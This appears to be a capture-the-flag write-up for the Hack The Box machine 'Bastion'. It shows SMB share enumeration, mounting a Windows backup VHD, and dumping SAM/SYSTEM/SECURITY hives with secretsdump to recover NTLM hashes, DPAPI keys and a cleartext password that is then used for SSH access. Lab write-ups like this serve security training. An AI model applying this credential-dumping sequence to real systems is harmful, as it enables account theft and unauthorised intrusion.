2 :139 :445 smb
$ smbclient -L 10.10.10.134
Enter WORKGROUP\kashz's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
$ smbclient //10.10.10.134/Backups
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 8 16:29:34 2021
.. D 0 Sat May 8 16:29:34 2021
nmap-test-file A 260 Sat May 8 16:29:34 2021
note.txt AR 116 Tue Apr 16 03:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 04:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 04:44:02 2019
WindowsImageBackup files contain .vhd files that we should look into Mounting the share
Using https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
$ sudo mount -t cifs //10.10.10.134/Backups /mnt/remote -o rw
[sudo] password for kashz:
Password for root@//10.10.10.134/Backups:
$ cd /mnt/remote
$ ls
nmap-test-file note.txt SDT65CB.tmp WindowsImageBackup
# making /mnt/vhd for one
# NEED TO RUN THIS AS SUDO USER INTERACTIVELY; else didn't work for me. was getting perms error while access the vhd files once mounted.
(as root)$ guestmount --add "/mnt/remote/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd -v
# cp SAM /home/kashz/Desktop/HTB/bastion
# cp SYSTEM /home/kashz/Desktop/HTB/bastion
# cp SECURITY /home/kashz/Desktop/HTB/bastion
$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
(or /usr/share/creddump7/pwdump.py SYSTEM SAM)
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Pass: bureaulampje
$ ssh l4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
Last updated